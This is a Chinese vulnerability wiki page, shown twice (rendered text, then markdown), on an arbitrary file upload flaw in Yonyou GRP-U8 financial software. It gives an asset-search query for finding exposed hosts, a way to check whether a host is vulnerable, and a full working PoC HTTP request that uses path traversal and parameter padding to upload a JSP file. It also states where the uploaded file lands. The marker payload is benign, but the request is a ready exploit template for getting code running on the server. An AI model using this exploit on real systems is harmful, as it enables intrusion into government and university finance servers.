fofamini-wiki

登录白背景

源码

用友GRP-U8 UploadFileData存在任意文件上传漏洞

一、漏洞简介

用友GRP-U8R10行政事业财务管理软件是用友公司专注于电子政务事业，基于云计算技术所推出的新一代产品，是我国行政事业财务领域专业的财务管理软件。用友 GRP-U8 UploadFileData接口存在任意文件上传漏洞，攻击者通过漏洞可以获取服务器权限。

二、影响版本

用友GRP-U8 行政事业内控管理软件（新政府会计制度专版）
用友GRP-U8 高校内控管理软件（Manager版）

三、资产测绘

hunterapp.name="用友GRP-U8 OA"
特征

四、漏洞复现

1.访问UploadFileData接口响应200表示可能存在漏洞

出现如下情况则表示漏洞已修复

通过poc上传文件

POST /UploadFileData?action=upload_file&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&foldername=%2e%2e%2f&filename=1.jsp&filename=1.jpg HTTP/1.1
Host: xx.xx.xx.xx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=59227D2C93FE3E8C2626DA625CE710F9
Content-Type: multipart/form-data
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Content-Length: 170

------WebKitFormBoundary92pUawKc

Content-Disposition: form-data; name="myFile";filename="test.jpg"

<% out.println("0xold6");%>

------WebKitFormBoundary92pUawKc--

上传文件位置

/R9iPortal/1.jsp

原文: https://www.yuque.com/xiaokp7/ocvun2/lkk0gahnhgt9oido

# 用友GRP-U8 UploadFileData存在任意文件上传漏洞

# 一、漏洞简介
用友GRP-U8R10行政事业财务管理软件是用友公司专注于电子政务事业，基于云计算技术所推出的新一代产品，是我国行政事业财务领域专业的财务管理软件。用友 GRP-U8 UploadFileData接口存在任意文件上传漏洞，攻击者通过漏洞可以获取服务器权限。

# 二、影响版本

- 用友GRP-U8 行政事业内控管理软件（新政府会计制度专版）
- 用友GRP-U8 高校内控管理软件（Manager版）

# 三、资产测绘

- hunter`app.name="用友GRP-U8 OA"`
- 特征

![image.png](./img/qFTqqAHvQYf6A0yY/1696132271756-860b06b9-a041-40a7-801c-1d19f68283a6-660891.png)
![image.png](./img/qFTqqAHvQYf6A0yY/1696132517728-7a746455-5255-4276-97e0-2f7c40f6cb39-786091.png)
![image.png](./img/qFTqqAHvQYf6A0yY/1696132546612-e8cecff0-554c-44de-a6f7-497c1618908d-684770.png)

# 四、漏洞复现
1.访问`UploadFileData`接口响应200表示可能存在漏洞
![image.png](./img/qFTqqAHvQYf6A0yY/1696132349491-defec506-2a97-4762-b641-417b8318d0ec-711893.png)
出现如下情况则表示漏洞已修复
![image.png](./img/qFTqqAHvQYf6A0yY/1696132393920-48341fa1-1bee-49a8-ada2-6c2970a38799-306596.png)

2. 通过poc上传文件
```
POST /UploadFileData?action=upload_file&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&foldername=%2e%2e%2f&filename=1.jsp&filename=1.jpg HTTP/1.1
Host: xx.xx.xx.xx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=59227D2C93FE3E8C2626DA625CE710F9
Content-Type: multipart/form-data
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Content-Length: 170

------WebKitFormBoundary92pUawKc

Content-Disposition: form-data; name="myFile";filename="test.jpg"

<% out.println("0xold6");%>

------WebKitFormBoundary92pUawKc--
```
![image.png](./img/qFTqqAHvQYf6A0yY/1696132447814-6ef3c3e7-b5a4-42b6-8dea-5228aa89c803-418257.png)

3. 上传文件位置
```
/R9iPortal/1.jsp
```
![image.png](./img/qFTqqAHvQYf6A0yY/1696132483722-097a222c-a109-4521-bce5-19e6e4cf7fdc-767276.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lkk0gahnhgt9oido>